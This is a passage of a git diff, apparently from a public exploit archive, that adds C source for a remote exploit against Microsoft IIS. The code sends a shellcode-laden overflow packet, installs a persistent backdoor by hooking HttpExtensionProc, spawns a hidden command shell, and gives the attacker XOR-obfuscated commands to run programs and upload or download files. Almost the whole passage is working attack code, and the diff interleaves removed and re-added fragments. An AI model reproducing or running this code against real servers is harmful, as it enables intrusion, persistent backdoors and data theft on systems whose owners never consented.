shellcodefnadd=shellcodefn; + temp=*shellcodefnadd; + if(temp==0xe9) { + ++shellcodefnadd; + k=*(int *)shellcodefnadd; + shellcodefnadd+=k; + shellcodefnadd+=4; + } + + for(k=0;k<=BUFFSIZE;++k){ + if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; + } +// k+=0x + memcpy(shellcodebuff,shellcodefnadd,k); //j); + cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); + for(j=0;j<0x400;++j){ + if(memcmp(str+j,"strend",6)==0) break; + } + memcpy(shellcodebuff+k,str,j); + sendpacketlong=k+j; + for(k=0;k<=0x200;++k){ + if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; + } +for(j=0;j<sendpacketlong;++j){ + temp=shellcodebuff[j]; +// temp^=DATAXORCODE; + shellcodebuff2[i+4+k]=DATABASE+temp/0x10; + ++k; + shellcodebuff2[i+4+k]=DATABASE+temp%0x10; + ++k; +} +j=i+k; +j=j%8+3; +shellcodebuff2[i+j+k]=0; +// j=strlen(shellcodebuff2)%8+3; +for(j=0;j<=0xe000;j+=4){ + strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32 +// strcat(shellcodebuff2,eipexceptwin2000cn); + } +/* +strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\ +x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\ +x90"); +for(j=0;j<=0xb00;j+=4){ + strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32 +} +*/ +// printf("\nbuff:%s",buff); +printf("\n shellcode long 0x%x\n",sendpacketlong); +if(argc>4&&strcmp(argv[4],"apache")==0){ + strcat(buff," "); +} +else strcat(buff,buff3); +printf("\n packetlong:0x%x\n",sendpacketlong); +strcat(buff,buff4); +if(argc>6) strcat(buff,argv[6]); +else strcat(buff,server); +strcat(buff,buff5); +if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); +else strcat(buff,shellcodebuff2); +// strcat(buff,buff51); +if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) { + printf("\n for %s system\n",argv[4]); + strcat(buff,buff61); +} +else strcat(buff,buff6); +// printf("\n send buff:\n%s",buff); +/* +i=strlen(buff); +memset(buff+i,'a',0xc000); +memset(buff+i+0xc000-strlen(buff7),0,1); +strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); +*/ +// strcpy(buff8,buff7); +/* temp=buff7[5]; +temp-=offset*0x10; +buff7[5]=temp; +i=*(int *)(buff7+4)+2; +printf("\nSEH=0x%x\n",i); +*/ +/* +for(i=0;i<8;++i){ + temp=buff7[i]; + printf("%2x",temp); +} +*/ +/* +for(i=0;i<0xc000/0x10;++i){ + strcat(buff,buff7); +} +*/ +// printf("\nbuff=%s\n",buff); +// strcat(buff,"\r\n"); +// printf("\n send buff:\n%s",buff); +// strcpy(buff+OVERADD+NOPLONG,shellcode); + sendpacketlong=strlen(buff); +// printf("buff:\n%s",buff+0x10000); +/* +#ifdef DEBUG + _asm{ + lea esp,buff + add esp,OVERADD + ret + } +#endif +*/ + lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; + lockintvar2=lockintvar1; + xordatabegin=0; + for(i=0;i<1;++i){ + j=sendpacketlong; +// buff[0x2000]=0; + fprintf(stderr,"\n send packet %d bytes.",j); +// gets(buff); + send(fd,buff,j,0); + buff7[0]=MCBSIZE; + + j=MEMSIZE+0x10; + i=0; + if(argc>4&&strcmp(argv[4],"winxp")==0) + { + j=0x18; + i=8; + } + for(k=0;i<0xc000;i+=0x10){ + if(i>=j) { + + k=((i-j)/(MCBSIZE*8)); + if(k<=6){ + memcpy(buff7+0x8,buff10,8); + buff7[0x8]=buff8[k]; + buff7[0xc]=buff9[k]; + } + else memcpy(buff7,buff11,0x10); + } + memcpy(buff+i,buff7,0x10); + + } + if(argc>4&&strcmp(argv[4],"apache")==0){ + for(k=0xb000;k<=0xc000;k+=2) + { + memset(buff+k,0x0d,1); + memset(buff+k+1,0x0a,1); + } + buff[0xc000]=0; + // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); + // printf("\nbuff:%s\n",buff); + } + else send(fd,buff,0xc000,0); + + k=0; + ioctlsocket(fd, FIONBIO, &k); + j=0; + while(j==0){ + k=newrecv(fd,recvbuff,BUFFSIZE,0); + if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { + xordatabegin=1; + fprintf(stderr,"\n ok!recv %d bytes\n",k); + recvbuff[k]=0; +// printf("\n recv:%s",recvbuff); +// for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int +*)(recvbuff+8+4*j)); + k=-1; + j=1; + } + if(k>0){ + recvbuff[k]=0; + fprintf(stderr,"\n recv:\n %s",recvbuff); + } + } + } + k=1; + ioctlsocket(fd, FIONBIO, &k); +// fprintf(stderr,"\n now begin: \n"); +/* + for(i=0;i<strlen(SRLF);++i){ + SRLF[i]^=DATAXORCODE; + } + send(fd,SRLF,strlen(SRLF),0); + send(fd,SRLF,strlen(SRLF),0); + send(fd,SRLF,strlen(SRLF),0); +*/ + k=1; + l=0; + while(k!=0){ + if(k<0){ + l=0; + i=0; + while(i==0){ + gets(buff); + if(memcmp(buff,"iish",4)==0){ + iishelp(); + i=2; + } + if(memcmp(buff,"iisput",6)==0){ + iisput(fd,buff+6); + i=2; + } + if(memcmp(buff,"iisget",6)==0){ + iisget(fd,buff+6); + i=2; + } + if(memcmp(buff,"iiscmd",6)==0){ + iiscmd(fd,buff+6); + i=2; + } + if(memcmp(buff,"iisreset",8)==0){ + iisreset(fd,buff+6); + i=2; + } + if(memcmp(buff,"iisdie",6)==0){ + iisdie(fd,buff+6); + i=2; + } + if(i==2)i=0; + else i=1; } - } - j=strlen(str); - for(i=0;i<j;++i){ - if(*(str+j-i-1)!=' ') { - break; - } - else *(str+j-i-1)=0; - } - - if(cmd=="\x0") { - printf("\niiscmd cmd\n"); - return; - } - printf("\nbegin run cmd:%s",cmd); - j=0; - ioctlsocket(fd, FIONBIO, &j); - Sleep(1000); - strcpy(buff,"iisc "); - strcat(buff,cmd); - newsend(fd,buff,strlen(buff),0); - Sleep(1000); - j=1; - ioctlsocket(fd, FIONBIO, &j); - /* - lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; - lockintvar2=lockintvar1; - */ + + k=strlen(buff); + + memcpy(buff+k,SRLF,3); + // send(fd,SRLF,strlen(SRLF),0); + // fprintf(stderr,"%s",buff); +/* + for(i=0;i<k+2;++i){ + lockintvar2=lockintvar2*0x100; + lockintvar2=lockintvar2%LOCKBIGNUM; + lockcharvar=lockintvar2%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; +// buff[i]^=DATAXORCODE; + } + send(fd,buff,k+2,0); +*/ + newsend(fd,buff,k+2,0); +// send(fd,SRLF,strlen(SRLF),0); + } + k=newrecv(fd,buff,BUFFSIZE,0); + if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) { + xordatabegin=1; + k=-1; + } + if(k>0){ +// fprintf(stderr,"recv %d bytes",k); +/* + if(xordatabegin==1){ + for(i=0;i<k;++i){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; + } + } +*/ + l=0; + buff[k]=0; + fprintf(stderr,"%s",buff); + } + else{ + Sleep(20); + if(l<20) k=1; + ++l; + + } +// if(k==0) break; + } + closesocket(fd); + WSACleanup( ); + fprintf(stderr,"\n the server close connect."); + gets(buff); + return(0); +} +void shellcodefnlock() +{ + _asm{ + nop + nop + nop + nop + nop + nop + nop + nop + + jmp next1 +getediadd: pop edi + mov esp,edi + and esp,0xfffff0f0 + jmp next2 +getshelladd: + push 0x01 + mov eax,edi + inc eax + inc eax + inc eax + inc eax + inc eax + mov edi,eax + mov esi,edi + // sub sp,8 + xor ecx,ecx +looplock: lodsb + cmp al,cl + jz shell + sub al,DATABASE + mov ah,al + lodsb + sub al,DATABASE + shl ah,4 + add al,ah + // lea eax,ptr word [edx*4+al] + stosb + jmp looplock +next1: call getediadd +next2: call getshelladd +shell: + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + + } - int newrecv(int fd,char *buff,int size,int flag){ - - int i,k; - k=recv(fd,buff,size,flag); - if(xordatabegin==1){ - for(i=0;i<k;++i){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - } - +} +void shellcodefn(char *ecb) +{ char Buff[SHELLBUFFSIZE+2]; + int *except[3]; + FARPROC memcpyadd; + FARPROC msvcrtdlladd; + FARPROC HttpExtensionProcadd; + FARPROC Aspdlladd; + + FARPROC RtlEnterCriticalSectionadd; + FARPROC Ntdlladd; + FARPROC Sleepadd; + FARPROC GetLastErroradd; + FARPROC GetFileSizeadd; + FARPROC CreateFileAadd; + FARPROC WriteFileadd; + FARPROC ReadFileadd; + FARPROC PeekNamedPipeadd; + FARPROC CloseHandleadd; + FARPROC CreateProcessadd; + FARPROC CreatePipeadd; + FARPROC procloadlib; + FARPROC apifnadd[1]; + FARPROC procgetadd=0; + FARPROC writeclient; + FARPROC readclient; + HCONN ConnID; + FARPROC shellcodefnadd=ecb; + char *stradd,*stradd2,*dooradd; + int imgbase,fnbase,i,k,l,thedoor; + HANDLE libhandle; + int fpt; //libwsock32; + STARTUPINFO siinfo; + PROCESS_INFORMATION ProcessInformation; + HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; + int lBytesRead; + int lockintvar1,lockintvar2; + char lockcharvar; + int shelllocknum; +// unsigned char temp; + SECURITY_ATTRIBUTES sa; + + _asm { jmp nextcall + getstradd: pop stradd + lea EDI,except + mov eax,dword ptr FS:[0] + mov dword ptr [edi+0x08],eax + mov dword ptr FS:[0],EDI + } + except[0]=0xffffffff; + except[1]=stradd-0x07; + imgbase=0x77e00000; + _asm{ + call getexceptretadd + } + for(;imgbase<0xbffa0000,procgetadd==0;){ + imgbase+=0x10000; + if(imgbase==0x78000000) imgbase=0xbff00000; + if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int +*)(imgbase+0x3c))=='EP'){ + fnbase=*(int *)(imgbase+*(int +*)(imgbase+0x3c)+0x78)+imgbase; + k=*(int *)(fnbase+0xc)+imgbase; + if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ + libhandle=imgbase; + k=imgbase+*(int *)(fnbase+0x20); + for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ + if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int +*)(4+imgbase+*(int *)k)=='Acor') + { + k=*(WORD *)(l+l+imgbase+*(int +*)(fnbase+0x24)); + k+=*(int *)(fnbase+0x10)-1; + k=*(int *)(k+k+k+k+imgbase+*(int +*)(fnbase+0x1c)); + procgetadd=k+imgbase; + break; + } + } + } + } + } +//����KERNEL32��DLLģ���ַ��API���� GetProcAddress��ַ +//ע�������������ҳ�治����� + if(procgetadd==0) goto die ; + i=stradd; + for(k=1;*stradd!=0;++k) { + if(*stradd==0x9) libhandle=procloadlib(stradd+1); + else apifnadd[k]=procgetadd(libhandle,stradd); + for(;*stradd!=0;++stradd){ + } + ++stradd; + } + ++stradd; + k=0x7ffdf020; + *(int *)k=RtlEnterCriticalSectionadd; + k=stradd; + stradd=i; + thedoor=0; + i=0; + _asm{ + jmp getdoorcall +getdooradd: pop dooradd; + mov l,esp + call getexceptretadd + } + if(i==0){ + ++i; + if(*(int *)ecb==0x90){ + if(*(int *)(*(int *)(ecb+0x64))=='ok!!') { + i=0; + thedoor=1; + } + } + } + if(i!=0){ + *(int *)(dooradd-0x0c)=HttpExtensionProcadd; + *(int *)(dooradd-0x13)=shellcodefnadd; + ecb=0; + _asm{ + call getexceptretadd + } + i=ecb; + i&=0xfffff000; + ecb=i; + ecb+=0x1000; + for(;i<l;++i,++ecb) + { + if(*(int *)ecb==0x90){ + if(*(int *)(ecb+8)==(int *)ecb){ + if(*(int *)*(int *)(ecb+0x64)=='ok!!') break; + } + } + } + i=0; + _asm{ + call getexceptretadd + } + i&=0xfffff000; + i+=0x1000; + for(;i<l;++i){ + if(*(int *)i==HttpExtensionProcadd){ + *(int *)i=dooradd-7; + // break; + } + } + // *(int *)(dooradd-0x0c)=HttpExtensionProcadd; + + } + writeclient= *(int *)(ecb+0x84); + readclient = *(int *)(ecb+0x88); + ConnID = *(int *)(ecb+8) ; + stradd=k; + _asm{ + lea edi,except + mov eax,dword ptr [edi+0x08] + mov dword ptr fs:[0],eax + } + if(thedoor==0){ + _asm{ + mov eax,0xffffffff + mov dword ptr fs:[0],eax + } + } + stradd2=stradd; + stradd+=8; + k=0x20; + writeclient(ConnID,*(int *)(ecb+0x6c),&k,0); + k=8; + writeclient(ConnID,stradd+9,&k,0); +// Sleepadd(100); + + shelllocknum=LOCKBIGNUM2; + if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int +*)(ecb+0x64)+4)=='notx') shelllocknum=0; + +// iiscmd: + lockintvar1=shelllocknum%LOCKBIGNUM; + lockintvar2=lockintvar1; +iiscmd: +/* + lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; + lockintvar2=lockintvar1; +*/ + sa.nLength=12; + sa.lpSecurityDescriptor=0; + sa.bInheritHandle=TRUE; + CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); + CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); +// ZeroMemory(&siinfo,sizeof(siinfo)); + _asm{ + lea EDI,siinfo + xor eax,eax + mov ecx,0x11 + repnz stosd + } + siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; + siinfo.wShowWindow = SW_HIDE; + siinfo.hStdInput = hReadPipe2; + siinfo.hStdOutput=hWritePipe1; + siinfo.hStdError =hWritePipe1; + k=0; +// while(k==0) +// { + k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, +&ProcessInformation); +// stradd+=8; +// } + Sleepadd(200); +// PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0 +); + + + i=0; + while(1) { + PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); + if(lBytesRead>0) { + i=0; + ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); + if(lBytesRead>0) { + for(k=0;k<lBytesRead;++k){ + lockintvar2=lockintvar2*0x100; + lockintvar2=lockintvar2%LOCKBIGNUM; + lockcharvar=lockintvar2%0x100; + Buff[k]^=lockcharvar; // DATAXORCODE; +// Buff[k]^=DATAXORCODE; + } + writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); +// Sleepadd(20); + } } else{ - if(k>0){ - buff[k]=0; - if(strstr(buff,"XORDATA")!=0) { - xordatabegin=1; - for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){ - lockintvar1=lockintvar1*0x100; - lockintvar1=lockintvar1%LOCKBIGNUM; - lockcharvar=lockintvar1%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - } - } +// Sleepadd(10); + l=0; + if(i<50){ + l=1; + ++i; + k=1; + lBytesRead=0; } - - } - return(k); - } - int newsend(int fd,char *buff,int size,int flag){ - int i; - - for(i=0;i<size;++i){ - lockintvar2=lockintvar2*0x100; - lockintvar2=lockintvar2%LOCKBIGNUM; - lockcharvar=lockintvar2%0x100; - buff[i]^=lockcharvar; // DATAXORCODE; - // buff[i]^=DATAXORCODE; + + + + while(l==0){ + i=0; + lBytesRead=SHELLBUFFSIZE; + k=readclient(ConnID,Buff,&lBytesRead); + for(l=0;l<lBytesRead;++l){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + Buff[l]^=lockcharvar; // DATAXORCODE; + } + + if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu +ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ + k=8; + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit +cmd.exe + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit +cmd.exe + stradd2=Buff+5; + Buff[lBytesRead]=0; + goto iiscmd; + } + if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu +ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ + + + lBytesRead=0x0c; + writeclient(ConnID,stradd+0x11,&lBytesRead,0); + lockintvar1=shelllocknum%LOCKBIGNUM; + lockintvar2=lockintvar1; + lBytesRead=0; + } + if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu +ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ + k=8; + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit +cmd.exe + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit +cmd.exe + *(int *)(dooradd-0x0c)=0; + Sleepadd(0x7fffffff); + _asm{ + mov eax,0 + mov esp,0 + jmp eax + } + } + + +if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] +==' ') + { + l=*(int *)(Buff+4); + // +WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); + fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ +GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 +); + k=GetLastErroradd(); + i=0; + while(l>0){ + lBytesRead=SHELLBUFFSIZE; + k=readclient(ConnID,Buff,&lBytesRead); + if(k==1){ + if(lBytesRead>0){ + for(k=0;k<lBytesRead;++k){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + Buff[k]^=lockcharvar; // +DATAXORCODE; + } + + l-=lBytesRead; + // if(fpt>0) + +WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); +// else Sleepadd(010); + } + +// if(i>100) l=0; + } + else { + Sleepadd(0100); + ++i; + } + if(i>10000) l=0; + } + + CloseHandleadd(fpt); + l=0; + } + else{ + +if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] +==' '){ + + // +fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN +G,FILE_ATTRIBUTE_NORMAL,0); + + +fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, +NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); + Sleepadd(100); + l=GetFileSizeadd(fpt,&k); + *(int *)Buff='ezis'; //size + *(int *)(Buff+4)=l; + lBytesRead=8; + for(i=0;i<lBytesRead;++i){ + lockintvar2=lockintvar2*0x100; + lockintvar2=lockintvar2%LOCKBIGNUM; + lockcharvar=lockintvar2%0x100; + Buff[i]^=lockcharvar; // DATAXORCODE; + } + + writeclient(ConnID,Buff,&lBytesRead,0); // +HSE_IO_SYNC); + // Sleepadd(100); + i=0; + while(l>0){ + k=SHELLBUFFSIZE; + ReadFileadd(fpt,Buff,k,&k,0); + if(k>0){ + for(i=0;i<k;++i){ + lockintvar2=lockintvar2*0x100; + lockintvar2=lockintvar2%LOCKBIGNUM +; + lockcharvar=lockintvar2%0x100; + Buff[i]^=lockcharvar; // +DATAXORCODE; + } + + i=0; + l-=k; + writeclient(ConnID,Buff,&k,0); // +HSE_IO_SYNC); +// Sleepadd(100); + // +k=readclient(ConnID,Buff,&lBytesRead); + + } + else ++i; + if(i>100) l=0; + } + CloseHandleadd(fpt); + l=0; + } + else l=1; + } } - return(send(fd,buff,size,flag)); + if(k!=1){ + k=8; + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe + WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe + k=GetLastErroradd(); + while(k==0x2746){ + if(thedoor==1) goto asmreturn; + Sleepadd(0x7fffffff); //���� + } + + } + else{ + +WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); + // Sleepadd(1000); + } + } } - void iishelp(){ - printf("\nusage:"); - printf("\niisget filename filename. get file from web server."); - printf("\niisput filename filename. put file to web server."); - printf("\niiscmd cmd. run cmd on web server."); - printf("\niisreset. reset the xor data."); - printf("\niisdie. reset the asp door."); - printf("\n\n"); - } \ No newline at end of file + + die: goto die ; + _asm{ +asmreturn: + mov eax,HSE_STATUS_SUCCESS + leave + ret 04 +door: push eax + mov eax,[esp+0x08] + mov eax,[eax+0x64] + mov eax,[eax] + cmp eax,'ok!!' + jnz jmpold + pop eax + push 0x12345678 //dooradd-0x13 + ret +jmpold: pop eax + push 0x12345678 //dooradd-0xc + ret //1 + jmp door //2 +getdoorcall: call getdooradd //5 + +getexceptretadd: pop eax + push eax + mov edi,dword ptr [stradd] + mov dword ptr [edi-0x0e],eax + ret +errprogram: mov eax,dword ptr [esp+0x0c] + add eax,0xb8 + mov dword ptr [eax],0x11223344 //stradd-0xe + xor eax,eax //2 + ret //1 +execptprogram: jmp errprogram //2 bytes stradd-7 +nextcall: call getstradd //5 bytes + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + } +} +void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) +{ + int i,k; + unsigned char temp; + char *calladd; + for(i=0;i<len;++i){ + temp=shellbuff[i]; + if(temp==0xe8){ + k=*(int *)(shellbuff+i+1); + calladd=fnadd; + calladd+=k; + calladd+=i; + calladd+=5; + if(calladd==chkesp){ + shellbuff[i]=0x90; + shellbuff[i+1]=0x43; // inc ebx + shellbuff[i+2]=0x4b; // dec ebx + shellbuff[i+3]=0x43; + shellbuff[i+4]=0x4b; + } + } + } +} +void iisput(int fd,char *str){ +char *filename; +char *filename2; +FILE *fpt; +char buff[0x2000]; +int size=0x2000,i,j,filesize,filesizehigh; +filename="\0"; +filename2="\0"; +j=strlen(str); +for(i=0;i<j;++i,++str){ + if(*str!=' '){ + filename=str; + break; + } +} +for(;i<j;++i,++str){ + if(*str==' ') { + *str=0; + break; + } +} +++i; +++str; +for(;i<j;++i,++str){ + if(*str!=' '){ + filename2=str; + break; + } +} +for(;i<j;++i,++str){ + if(*str==' ') { + *str=0; + break; + } +} +if(filename=="\x0") { + printf("\n iisput filename [path\\fiename]\n"); + return; +} +if(filename2=="\x0") filename2=filename; +printf("\n begin put file:%s",filename); +j=0; +ioctlsocket(fd, FIONBIO, &j); +Sleep(1000); +fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, +FILE_ATTRIBUTE_NORMAL,0); +filesize=GetFileSize(fpt,&filesizehigh); +strcpy(buff,"put "); +*(int *)(buff+4)=filesize; +filesize=*(int *)(buff+4); +strcpy(buff+0x8,filename2); +newsend(fd,buff,i+0x9,0); +printf("\n put file:%s to file:%s %d +bytes",filename,filename2,filesize); +Sleep(1000); +while(filesize>0){ + size=0x800; + ReadFile(fpt,buff,size,&size,NULL); + if(size>0){ + filesize-=size; + newsend(fd,buff,size,0); +// Sleep(0100); + + } +} +// size=filesize; +// ReadFile(fpt,buff,size,&size,NULL); +// if(size>0) send(fd,buff,size,0); +CloseHandle(fpt); +j=1; +ioctlsocket(fd, FIONBIO, &j); +printf("\n put file ok!\n"); +Sleep(1000); +} +void iisget(int fd,char *str){ +char *filename; +char *filename2; +FILE *fpt; +char buff[0x2000]; +int size=0x2000,i,j,filesize,filesizehigh; +filename="\0"; +filename2="\0"; +j=strlen(str); +for(i=0;i<j;++i,++str){ + if(*str!=' '){ + filename=str; + break; + } +} +for(;i<j;++i,++str){ + if(*str==' ') { + *str=0; + break; + } +} +++i; +++str; +for(;i<j;++i,++str){ + if(*str!=' '){ + filename2=str; + break; + } +} +for(;i<j;++i,++str){ + if(*str==' ') { + *str=0; + break; + } +} +if(filename=="\x0") { + printf("\n iisget filename [path\\fiename]\n"); + return; +} +if(filename2=="\x0") filename2=filename; +printf("\n begin get file:%s",filename); +fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR +E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); +strcpy(buff,"get "); +strcpy(buff+0x4,filename2); +newsend(fd,buff,i+0x5,0); +printf("\n get file:%s from file:%s",filename,filename2); + j=0; + ioctlsocket(fd, FIONBIO, &j); +i=0; +filesize=0; +j=0; +while(j<100){ +// Sleep(100); + i=newrecv(fd,buff,0x800,0); + if(i>0){ + buff[i]=0; + if(memcmp(buff,"size",4)==0){ + filesize=*(int *)(buff+4); + j=100; + } + else { + +/* for(j=0;j<i;++j){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + buff[j]^=lockcharvar; // DATAXORCODE; + } +*/ + j=0; + printf("\n recv %s",buff); + } + } + else ++j; +// if(j>1000) i=0; +} +printf("\n file %d bytes %d\n",filesize,i); +if(i>8){ + i-=8; + filesize-=i; + WriteFile(fpt,buff+8,i,&i,NULL); + +} +while(filesize>0){ + size=newrecv(fd,buff,0x800,0); + if(size>0){ + filesize-=size; + WriteFile(fpt,buff,size,&size,NULL); + + } + else { + if(size==0) { + printf("\n ftp close \n "); + } + else { + printf("\n Sleep(100)"); + Sleep(100); + } + } +} +CloseHandle(fpt); +printf("\n get file ok!\n"); +j=1; +ioctlsocket(fd, FIONBIO, &j); +} +void iisreset(int fd,char *str){ + char buff[0x2000]; + int i,j; + printf("\nreset xor data.\n"); + Sleep(1000); + j=0; + ioctlsocket(fd, FIONBIO, &j); + strcpy(buff,"reset"); + newsend(fd,buff,strlen(buff),0); + Sleep(1000); + + lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; + lockintvar2=lockintvar1; + while(1){ + j=recv(fd,buff,0x2000,0); + if(j>0){ + buff[j]=0; + for(i=0;i<j;++i){ + if(buff[i]==0) buff[i]='b'; + } + // printf("\nrecv 0x%x bytes:%s",j,buff); + if(strstr(buff,"xordatareset")!=0){ + printf("\nxor data reset ok.\n"); + for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; + } + + break; + } + } +// else if(j==0) break; +// strcpy(buff,"\r\nmkdir d:\\test6\r\n"); +// newsend(fd,buff,strlen(buff),0); + } + Sleep(1000); + j=1; + ioctlsocket(fd, FIONBIO, &j); +// printf("aaa"); +} +void iisdie(int fd,char *str){ + char buff[0x200]; + int j; + printf("\niis die.\n"); + j=0; + ioctlsocket(fd, FIONBIO, &j); + Sleep(1000); + strcpy(buff,"iisrr "); + newsend(fd,buff,strlen(buff),0); + Sleep(1000); + j=1; + ioctlsocket(fd, FIONBIO, &j); + lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; + lockintvar2=lockintvar1; +} +void iiscmd(int fd,char *str){ + char *cmd="\0"; + char buff[2000]; + int i,j; + j=strlen(str); + for(i=0;i<j;++i,++str){ + if(*str!=' '){ + cmd=str; + break; + } + } + j=strlen(str); + for(i=0;i<j;++i){ + if(*(str+j-i-1)!=' ') { + break; + } + else *(str+j-i-1)=0; + } + + if(cmd=="\x0") { + printf("\niiscmd cmd\n"); + return; + } + printf("\nbegin run cmd:%s",cmd); + j=0; + ioctlsocket(fd, FIONBIO, &j); + Sleep(1000); + strcpy(buff,"iisc "); + strcat(buff,cmd); + newsend(fd,buff,strlen(buff),0); + Sleep(1000); + j=1; + ioctlsocket(fd, FIONBIO, &j); +/* + lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; + lockintvar2=lockintvar1; +*/ +} +int newrecv(int fd,char *buff,int size,int flag){ + + int i,k; + k=recv(fd,buff,size,flag); + if(xordatabegin==1){ + for(i=0;i<k;++i){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; + } + + } + else{ + if(k>0){ + buff[k]=0; + if(strstr(buff,"XORDATA")!=0) { + xordatabegin=1; + for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){ + lockintvar1=lockintvar1*0x100; + lockintvar1=lockintvar1%LOCKBIGNUM; + lockcharvar=lockintvar1%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; + } + } + } + + } + return(k); +} +int newsend(int fd,char *buff,int size,int flag){ + int i; + + for(i=0;i<size;++i){ + lockintvar2=lockintvar2*0x100; + lockintvar2=lockintvar2%LOCKBIGNUM; + lockcharvar=lockintvar2%0x100; + buff[i]^=lockcharvar; // DATAXORCODE; + // buff[i]^=DATAXORCODE; + } + return(send(fd,buff,size,flag)); +} +void iishelp(){ + printf("\nusage:"); + printf("\niisget filename filename. get file from web server."); + printf("\niisput filename filename. put file to web server."); + printf("\niiscmd cmd. run cmd on web server."); + printf("\niisreset. reset the xor data."); + printf("\niisdie. reset the asp door."); + printf("\n\n"); +} \ No newline at end of file diff --git a/platforms/windows/remote/21372.txt b/platforms/windows/remote/21372.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21376.html b/platforms/windows/remote/21376.html 